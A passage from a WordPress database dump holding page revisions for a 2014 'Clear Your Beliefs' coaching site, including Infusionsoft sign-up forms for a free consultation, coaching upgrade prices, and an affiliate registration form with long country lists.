value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</form></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</div>\r\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 16:34:27', '2014-07-04 21:34:27', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1241, 4194, '2014-07-04 16:35:43', '2014-07-04 21:35:43', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 650px;">\r\n\r\n<h1 style="text-align: center;">Schedule Your Free 20-minute Consultation</h1>\r\n<div style="width: 47%; float: left;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</form></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</div>\r\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 16:35:43', '2014-07-04 21:35:43', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1252, 4194, '2014-07-09 15:28:19', '2014-07-09 20:28:19', '<h1>Add Coaching to Your <em>Clear Your Beliefs</em> Program</h1>\n&nbsp;\n\n<b>If you''ve already purchased the Clear Your Beliefs program, you may find that some guidance would be a benefit.   </b>\n\n<b></b>The program takes you deep into your subconscious mind, which can sometimes be tricky territory to traverse.   Our Clear Your Beliefs Coaches are highly trained professionals who can walk you through the most difficult terrain, and help you clear whatever is in your way.  They''ll also be available to answer your questions, and take you even deeper into the process.\n<h6>Add 3.5 hours of Coaching to your Program:  $275.</h6>\nThis option provides you with a half-hour of coaching per session. You are welcome to use it at any pace you wish.   After your 3.5 hours have been used, your Coach will let you know how to order additional hours directly from them.\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-12-hour-each-week"><button class="btn">Enroll Now</button>\n<h6>Add 7 hours of Coaching to your Program:  $540.</h6>\nThis option provides you with a full hour of coaching per session. You are welcome to use it at any pace you wish.   After your 7 hours have been used, your Coach will let you know how to order additional hours directly from them.\n\n<a href="\n\n&nbsp;', 'Coaching', '', 'inherit', 'closed', 'open', '', '1141-autosave-v1', '', '', '2014-07-09 15:28:19', '2014-07-09 20:28:19', '', 1141, 'http://clearyourbeliefs.com/1141-autosave-v1', 0, 'revision', '', 0),
(1253, 4194, '2014-07-09 15:29:08', '2014-07-09 20:29:08', '<h1>Add Coaching to Your <em>Clear Your Beliefs</em> Program</h1>\r\n&nbsp;\r\n\r\n<b>If you''ve already purchased the Clear Your Beliefs program, you may find that some guidance would be a benefit.   </b>\r\n\r\n<b></b>The program takes you deep into your subconscious mind, which can sometimes be tricky territory to traverse.   Our Clear Your Beliefs Coaches are highly trained professionals who can walk you through the most difficult terrain, and help you clear whatever is in your way.  They''ll also be available to answer your questions, and take you even deeper into the process.\r\n<h6>Add 3.5 hours of Coaching to your Program:  $275.</h6>\r\nThis option provides you with a half-hour of coaching per session. You are welcome to use it at any pace you wish.   After your 3.5 hours have been used, your Coach will let you know how to order additional hours directly from them.\r\n\r\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-12-hour-each-week"><button class="btn">Enroll Now</button>\r\n<h6>Add 7 hours of Coaching to your Program:  $540.</h6>\r\nThis option provides you with a full hour of coaching per session. You are welcome to use it at any pace you wish.   After your 7 hours have been used, your Coach will let you know how to order additional hours directly from them.\r\n\r\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-1-hour-each-week"><button class="btn">Enroll Now</button>\r\n\r\n&nbsp;', 'Coaching', '', 'inherit', 'closed', 'open', '', '1141-revision-v1', '', '', '2014-07-09 15:29:08', '2014-07-09 20:29:08', '', 1141, 'http://clearyourbeliefs.com/1141-revision-v1', 0, 'revision', '', 0),
(1254, 4194, '2014-07-09 15:29:29', '2014-07-09 20:29:29', '<h1>Add Coaching to Your <em>Clear Your Beliefs</em> Program</h1>\r\n&nbsp;\r\n\r\n<b>If you''ve already purchased the Clear Your Beliefs program, you may find that some guidance would be a benefit.   </b>\r\n\r\n<b></b>The program takes you deep into your subconscious mind, which can sometimes be tricky territory to traverse.   Our Clear Your Beliefs Coaches are highly trained professionals who can walk you through the most difficult terrain, and help you clear whatever is in your way.  They''ll also be available to answer your questions, and take you even deeper into the process.\r\n<h6>Add 3.5 hours of Coaching to your Program:  $275.</h6>\r\nThis option provides you with a half-hour of coaching per session. You are welcome to use it at any pace you wish.   After your 3.5 hours have been used, your Coach will let you know how to order additional hours directly from them.\r\n\r\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-12-hour-each-week"><button class="btn">Enroll Now</button></a>\r\n<h6>Add 7 hours of Coaching to your Program:  $540.</h6>\r\nThis option provides you with a full hour of coaching per session. You are welcome to use it at any pace you wish.   After your 7 hours have been used, your Coach will let you know how to order additional hours directly from them.\r\n\r\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-1-hour-each-week"><button class="btn">Enroll Now</button></a>\r\n\r\n&nbsp;', 'Coaching', '', 'inherit', 'closed', 'open', '', '1141-revision-v1', '', '', '2014-07-09 15:29:29', '2014-07-09 20:29:29', '', 1141, 'http://clearyourbeliefs.com/1141-revision-v1', 0, 'revision', '', 0),
(1266, 4194, '2014-07-30 09:52:16', '2014-07-30 14:52:16', '<h1 style="text-align: center;">Affiliate Registration</h1>\n<div class="icon_box style=">\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\n\n// ]]></script>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST" name="CYB Referall Partner Registration"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\n<table class="background" style="width: 100%; height: 100%;border: none;" cellspacing="0" cellpadding="10">\n<tbody>\n<tr>\n<td align="center" valign="top">\n<table class="bodyContainer webFormBodyContainer" style="border: none;" width="100%" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF">\n<tbody>\n<tr>\n<td class="body" valign="top" bgcolor="#FFFFFF">\n<div>\n<div class="text">\n<div class="text">\n<div>\n<div><span style="color: #000000;"> </span></div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<table class="infusion-field-container" style="width: 100%;" border="0">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\n</tr>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_LastName">Last Name *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div></div>\n<div></div>\n<div></div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_Company">Company</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_Phone1">Phone Number *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress1">Street Address 1 *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></td>\n</tr>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress2"> Street Address 2</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></td>\n</tr>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_City"> City *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></td>\n</tr>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_State">State *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" /></td>\n</tr>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_PostalCode"> Postal Code *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></td>\n</tr>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_Country">Country *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic 